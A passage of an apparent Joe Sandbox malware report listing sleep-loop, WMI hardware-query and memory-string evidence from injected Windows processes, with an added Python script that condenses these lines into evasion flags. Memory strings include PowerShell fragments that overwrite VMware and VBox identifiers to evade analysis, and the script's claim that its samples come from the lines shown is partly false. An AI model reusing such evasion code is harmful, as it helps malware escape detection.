        Source: C:\Windows\System32\lsass.exe TID: 9196 | Thread sleep count: 837 > 30
        Source: C:\Windows\System32\lsass.exe TID: 9196 | Thread sleep time: -837000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 9208 | Thread sleep count: 44 > 30
        Source: C:\Windows\System32\svchost.exe TID: 9208 | Thread sleep time: -44000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 9212 | Thread sleep count: 1342 > 30
        Source: C:\Windows\System32\svchost.exe TID: 9212 | Thread sleep time: -67100s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 6916 | Thread sleep count: 8236 > 30
        Source: C:\Windows\System32\dwm.exe TID: 6916 | Thread sleep time: -8236000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 6920 | Thread sleep count: 708 > 30
        Source: C:\Windows\System32\dwm.exe TID: 6920 | Thread sleep time: -35400s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6928 | Thread sleep count: 104 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6928 | Thread sleep time: -104000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6932 | Thread sleep count: 1366 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6932 | Thread sleep time: -68300s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6944 | Thread sleep count: 1367 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6944 | Thread sleep time: -68350s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6952 | Thread sleep count: 108 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6952 | Thread sleep time: -108000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6956 | Thread sleep count: 1280 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6956 | Thread sleep time: -64000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6964 | Thread sleep count: 45 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6964 | Thread sleep time: -45000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6968 | Thread sleep count: 1207 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6968 | Thread sleep time: -60350s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7000 | Thread sleep count: 1120 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7000 | Thread sleep time: -56000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7028 | Thread sleep count: 103 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7028 | Thread sleep time: -103000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7032 | Thread sleep count: 1289 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7032 | Thread sleep time: -64450s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7048 | Thread sleep count: 1283 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7048 | Thread sleep time: -64150s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5948 | Thread sleep count: 1255 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5948 | Thread sleep time: -62750s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5900 | Thread sleep count: 1237 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5900 | Thread sleep time: -61850s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6972 | Thread sleep count: 1265 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6972 | Thread sleep time: -63250s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6976 | Thread sleep count: 1268 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6976 | Thread sleep time: -63400s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8248 | Thread sleep count: 1186 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8248 | Thread sleep time: -59300s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6760 | Thread sleep count: 1143 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6760 | Thread sleep time: -57150s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6828 | Thread sleep count: 1174 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6828 | Thread sleep time: -58700s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5444 | Thread sleep count: 1211 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5444 | Thread sleep time: -60550s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7664 | Thread sleep count: 1166 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7664 | Thread sleep time: -58300s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7964 | Thread sleep count: 813 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7964 | Thread sleep time: -40650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8212 | Thread sleep count: 92 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8212 | Thread sleep time: -92000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8252 | Thread sleep count: 799 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8252 | Thread sleep time: -39950s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8348 | Thread sleep count: 795 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8348 | Thread sleep time: -39750s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1672 | Thread sleep count: 789 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1672 | Thread sleep time: -39450s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2360 | Thread sleep count: 772 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2360 | Thread sleep time: -38600s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5608 | Thread sleep count: 803 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5608 | Thread sleep time: -40150s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8428 | Thread sleep count: 767 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8428 | Thread sleep time: -38350s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8392 | Thread sleep count: 189 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6156 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8404 | Thread sleep count: 1031 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8404 | Thread sleep time: -51550s >= -30000s
        Source: C:\Windows\System32\spoolsv.exe TID: 8432 | Thread sleep count: 1073 > 30
        Source: C:\Windows\System32\spoolsv.exe TID: 8432 | Thread sleep time: -53650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8456 | Thread sleep count: 1039 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8456 | Thread sleep time: -51950s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8488 | Thread sleep count: 1081 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8488 | Thread sleep time: -54050s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8384 | Thread sleep count: 57 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8384 | Thread sleep time: -57000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8380 | Thread sleep count: 1080 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8380 | Thread sleep time: -54000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8408 | Thread sleep count: 91 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8408 | Thread sleep time: -91000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8360 | Thread sleep count: 1104 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8360 | Thread sleep time: -55200s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8336 | Thread sleep count: 704 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8336 | Thread sleep time: -35200s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
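The "Thread sleep count" / "Thread sleep time" entries and the WMI queries above are the raw evidence behind the sandbox's evasion verdict, spread over many process instances. The script below is an added triage example (it is not part of the Joe Sandbox report or of its tooling) that condenses such lines into one row per process image: it parses the sleep and WMI entries, re-applies the thresholds the report itself prints (more than 30 sleep calls, a total sleep of at least 30000 in the report's own units, shown with a leading minus sign) and flags queries against the hardware classes a VM check normally keys on. The input is a constructed subset of the lines shown above, in the form in which they were extracted here (no separator between the Source cell and the signature cell); the regexes also accept a " | " separator. The class set VM_FINGERPRINT_CLASSES and the flag names are this example's own assumptions.

```python
"""Condense Joe Sandbox evasion evidence lines into a per-process summary.

Added example, not part of the sandbox report or its tooling.  The regexes
accept both the raw extraction (no separator between the Source cell and
the signature cell) and a ' | ' separated rendering of the same lines.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the evidence lines from the report above.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440Thread sleep count: 3658 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep count: 2644 > 30",
    r"Source: C:\Windows\System32\cmd.exe TID: 2640Thread sleep time: -55900s >= -30000s",
    r"Source: C:\Windows\System32\winlogon.exe TID: 9168Thread sleep count: 6458 > 30",
    r"Source: C:\Windows\System32\winlogon.exe TID: 9168Thread sleep time: -6458000s >= -30000s",
    r"Source: C:\Windows\System32\svchost.exe TID: 9208Thread sleep count: 44 > 30",
    r"Source: C:\Windows\System32\svchost.exe TID: 9208Thread sleep time: -44000s >= -30000s",
    r"Source: C:\Windows\System32\svchost.exe TID: 6156Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem",
    r"Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Windows\System32\cmd.exeAPI coverage: 9.8 %",   # not an evasion line; must be ignored
]

# Source cell: a drive-letter path ending in .exe/.com; the cell separator is optional.
SRC = r"Source: (?P<src>[A-Za-z]:\\[^|]*?\.(?:exe|com))"
SEP = r"\s*\|?\s*"
RE_COUNT = re.compile(SRC + r" TID: (?P<tid>\d+)" + SEP
                      + r"Thread sleep count: (?P<n>\d+) > (?P<thr>\d+)")
# The report prints the delay with a leading minus sign; only the magnitude is kept.
RE_TIME = re.compile(SRC + r" TID: (?P<tid>\d+)" + SEP
                     + r"Thread sleep time: -(?P<t>\d+)s >= -(?P<thr>\d+)s")
RE_WMI = re.compile(SRC + SEP + r"WMI Queries: IWbemServices::(?P<method>\w+) - "
                    + r"(?P<ns>\S+) : (?:SELECT \* FROM )?(?P<cls>\w+)")

# WMI classes a VM check commonly reads for hardware vendor/model/serial strings.
# Assumption of this example, chosen to match the classes the report shows queried.
VM_FINGERPRINT_CLASSES = {"Win32_BIOS", "Win32_BaseBoard",
                          "Win32_ComputerSystem", "Win32_Processor"}


def parse_line(line):
    """Return (kind, fields) for a recognised evidence line, else None."""
    for kind, rx in (("sleep_count", RE_COUNT), ("sleep_time", RE_TIME), ("wmi", RE_WMI)):
        m = rx.search(line)
        if m:
            return kind, m.groupdict()
    return None


def summarize(lines):
    """Aggregate sleep and WMI evidence per process image (basename of the Source path)."""
    out = defaultdict(lambda: {"sleep_calls": 0, "sleep_total": 0,
                               "threads": set(), "wmi_classes": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind, f = parsed
        rec = out[f["src"].rsplit("\\", 1)[-1].lower()]
        if kind == "sleep_count":
            rec["sleep_calls"] += int(f["n"])
            rec["threads"].add(int(f["tid"]))
        elif kind == "sleep_time":
            rec["sleep_total"] += int(f["t"])
            rec["threads"].add(int(f["tid"]))
        else:
            rec["wmi_classes"].add(f["cls"])
    return dict(out)


def evasion_flags(rec, min_calls=30, min_total=30000):
    """Re-apply the thresholds printed in the report (count > 30, total >= 30000)
    and flag hardware-fingerprinting WMI classes.  Flag names are this example's own."""
    flags = []
    if rec["sleep_calls"] > min_calls:
        flags.append("sleep-loop")
    if rec["sleep_total"] >= min_total:
        flags.append("long-sleep")
    if rec["wmi_classes"] & VM_FINGERPRINT_CLASSES:
        flags.append("wmi-hw-fingerprint")
    return flags


if __name__ == "__main__":
    for proc, rec in sorted(summarize(SAMPLE_LINES).items()):
        print(f"{proc:16} calls={rec['sleep_calls']:<6} total={rec['sleep_total']:<8} "
              f"threads={len(rec['threads'])} wmi={sorted(rec['wmi_classes'])} "
              f"flags={evasion_flags(rec)}")
```

Run it against the full set of lines from the report and the per-image rows make the pattern obvious: the sleep loops and hardware queries appear in system images (winlogon.exe, lsass.exe, dwm.exe, svchost.exe) as well as in powershell.exe, which is what one expects once the injection signatures in the summary are taken into account.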
        Source: C:\Windows\System32\cmd.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\more.com | Last function: Thread delayed
        Source: C:\Windows\System32\more.com | Last function: Thread delayed
        Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
        Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
        Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
        Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\dwm.exe | Last function: Thread delayed
        Source: C:\Windows\System32\dwm.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exe | Last function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0F264 FindFirstFileExW,3_2_000001D54FA0F264
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_000001D54FA0F3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00000281B7BCF3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCF264 FindFirstFileExW,4_2_00000281B7BCF264
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_000001F66D19F3E8
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19F264 FindFirstFileExW,9_2_000001F66D19F264
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_0000019AB937F3E8
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937F264 FindFirstFileExW,14_2_0000019AB937F264
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001A53EDAF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDAF264 FindFirstFileExW,15_2_000001A53EDAF264
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CF264 FindFirstFileExW,17_2_0000027D8F4CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000027D8F4CF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000001AD09EAF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EAF264 FindFirstFileExW,18_2_000001AD09EAF264
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC013F264 FindFirstFileExW,19_2_0000020EC013F264
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC013F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000020EC013F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00000229EA6AF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6AF264 FindFirstFileExW,20_2_00000229EA6AF264
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDCF264 FindFirstFileExW,21_2_000001777BDCF264
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001777BDCF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6BF264 FindFirstFileExW,22_2_000001590E6BF264
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001590E6BF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A6F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000021C29A6F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A6F264 FindFirstFileExW,23_2_0000021C29A6F264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72CF264 FindFirstFileExW,24_2_00000276D72CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000276D72CF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000021D846CF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846CF264 FindFirstFileExW,25_2_0000021D846CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_0000025BFDA9F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA9F264 FindFirstFileExW,26_2_0000025BFDA9F264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000001691456F264 FindFirstFileExW,27_2_000001691456F264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000001691456F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_000001691456F3E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: svchost.exe, 00000015.00000002.2820290178.000001777BFFA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
        Source: svchost.exe, 00000027.00000002.2730575033.0000027240278000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NTFS;;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 00000027.00000000.1719652960.0000027240302000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
        Source: svchost.exe, 00000018.00000002.2870533670.00000276D7F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
        Source: svchost.exe, 00000018.00000000.1657687966.00000276D90CE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
        Source: svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f58
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
        Source: svchost.exe, 0000000F.00000000.1585342930.000001A53EA13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000Xt
